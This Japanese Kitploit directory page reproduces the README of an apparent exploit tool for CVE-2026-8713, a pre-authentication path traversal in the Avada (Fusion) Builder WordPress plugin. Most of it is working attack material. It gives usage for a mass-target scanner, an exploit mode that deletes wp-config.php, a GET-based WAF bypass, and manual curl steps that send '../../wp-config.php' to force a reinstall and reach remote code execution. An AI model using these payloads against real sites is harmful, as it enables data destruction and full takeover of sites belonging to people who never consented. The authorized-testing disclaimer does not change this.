Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-8713 — Avada(Fusion)Builder <= 3.15.3 における事前認証のパストラバーサルによる任意のファイル削除、RCEにつながる(CVSS 9.1) | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-8713
脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスウェブセキュリティペネトレーションテスト学習と教育
GitHubshinthink/cve-2026-8713

CVE-2026-8713

Avada(Fusion)Builder <= 3.15.3 における事前認証のパストラバーサルによる任意のファイル削除、RCEにつながる(CVSS 9.1)

リポジトリを見る
41ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-8713 — Avada (Fusion) Builder WordPress エクスプロイト

事前認証パストラバーサル → 任意ファイル削除 → 強制再インストール → RCE


概要

CVE-2026-8713 は、WordPress 用の Avada (Fusion) Builder プラグイン/テーマにおける CVSS 9.1 の重大な脆弱性です。Fusion_Form_DB_Entries クラスの maybe_delete_files() 関数は、攻撃者が制御するフォーム入力値から単純な文字列置換を用いてファイルシステムパスを構築します。realpath() による検証やディレクトリ包含チェックは行われません。

未認証の攻撃者は、fusion_form_submit_ajax ハンドラを介してパストラバーサルペイロードを送信します。Fusion_Form_DB_Privacy のシャットダウンフックが privacy_expiration_action=delete でエントリを処理すると、対象のファイルがサーバーから削除されます。

影響を受けるバージョン

VersionStatus
Fusion Builder ≤ 3.15.3脆弱
Fusion Builder ≥ 3.15.4パッチ済み
Avada theme (all)同梱プラグインが脆弱な可能性があります

注記: Avada テーマのバージョン (7.x) は Fusion Builder プラグインのバージョン (3.x) とは異なります。脆弱性はプラグイン側にありますが、スキャナは両方を検出します。


脆弱性のメカニズム

根本原因

fusion-builder/inc/class-fusion-form-db-entries.php 内の maybe_delete_files() メソッドは、包含チェックなしの文字列置換でファイルパスを解決します:

root@kitploit:~
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check — path traversal sequences pass through
unlink($file_path);

攻撃チェーン

  1. 攻撃者は wp_ajax_nopriv_fusion_form_submit_ajax を介して Avada フォームを送信します → パストラバーサル: ../../wp-config.php → privacy_expiration_action = delete → privacy_expiration_interval = 0

  2. WordPress のシャットダウンフックが Fusion_Form_DB_Privacy を起動します → 保存されたフォームエントリを処理します → 攻撃者が制御するパスに対して maybe_delete_files() を呼び出します → wp-config.php が削除されます

  3. WordPress がセットアップ/インストールモードに入ります → 攻撃者がサイトを悪意のあるデータベースに接続します → 完全なリモートコード実行 (RCE)

未認証アクセス

AJAX ハンドラは wp_ajax_nopriv_ で登録されているため、未認証ユーザーがアクセスできます:

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=<id>
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_<name>=../../wp-config.php

WAF バイパス

多くのホストは /wp-admin/admin-ajax.php への POST をブロックします。WordPress はこのエンドポイントで GET によるパラメータ受け渡しを受け付けるため、簡単なバイパスが可能です:

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...

インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt

使用方法

root@kitploit:~
# Detection only (default — no file deletion)
python cve_2026_8713.py -t target.com

# Mass detection
python cve_2026_8713.py -f targets.txt

# Exploit mode — delete wp-config.php
python cve_2026_8713.py -t target.com --exploit

# Delete custom file
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"

引数

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  --exploit         Enable file deletion (default: detection only)
  --delete PATH     Custom file path to delete (default: wp-config.php)
  -o, --output      Save results to file
  --threads         Workers (default: 20)
  -v, --verbose     Show detailed output

概念実証

検出モード

root@kitploit:~
$ python cve_2026_8713.py -f targets.txt
root@kitploit:~
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  Mode: Detection  |  Targets: 521  |  Workers: 20
  ───────────────────────────────────────────────────────

  [EXPLOIT]  target-vuln.com      1.2s  form #3  (AJAX open)
  [VULN]     target-waf.com       2.1s  form #1  (WAF blocked)
  [AVADA]    target-noform.com    0.5s  (no form found)
  [-]        target-noavada.com   0.3s

  ───────────────────────────────────────────────────────
  Scan complete  |  Time: 45s
  ───────────────────────────────────────────────────────
  Targets        : 521
  Avada detected : 47
  Forms found    : 12
  Vulnerable     : 9

エクスプロイトモード

root@kitploit:~
$ python cve_2026_8713.py -t target.com --exploit -v
root@kitploit:~
  CVE-2026-8713 — Avada Builder Exploit
  CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE

    [+] Found Avada form: id=3
    [+] POST form_id=3: HTTP 403 (WAF blocked)
    [+] GET form_id=3: HTTP 200 (WAF bypassed)

  Host     : target.com
  Avada    : YES
  Form     : 3
  Deleted  : wp-config.php (force reinstall → RCE)
  Time     : 3.2s

手動エクスプロイト

ステップ 1 — Avada の確認

root@kitploit:~
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5

ステップ 2 — フォーム ID を見つける

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'

ステップ 3 — パストラバーサルでフォームを送信する

root@kitploit:~
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'

ステップ 4 — WAF バイパス (POST がブロックされている場合)

root@kitploit:~
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'

ステップ 5 — RCE の検証とエクスプロイト

root@kitploit:~
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config deleted → connect malicious DB → full RCE

免責事項

教育および許可されたテスト目的のみに使用してください。

本ソフトウェアは、許可されたペネトレーションテストを実施するセキュリティ専門家、自社インフラを監査する組織、脆弱性の悪用を研究する研究者を対象としています。

コンピュータシステムへの不正アクセスは違法であり、以下の法律に違反する可能性があります:

  • 米国: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • インドネシア: UU ITE Pasal 30 & 46
  • 欧州連合: Directive 2013/40/EU
  • 英国: Computer Misuse Act 1990

著者は誤用に対する責任を負いません。


参照


このプロジェクトは ThemeFusion または Avada とは提携していません。

ツールをダウンロード
ResourceLink
IONIX アドバイザリionix.io/threat-center/cve-2026-8713
Wordfence アドバイザリwordfence.com
Patchstackpatchstack.com
NVD エントリCVE-2026-8713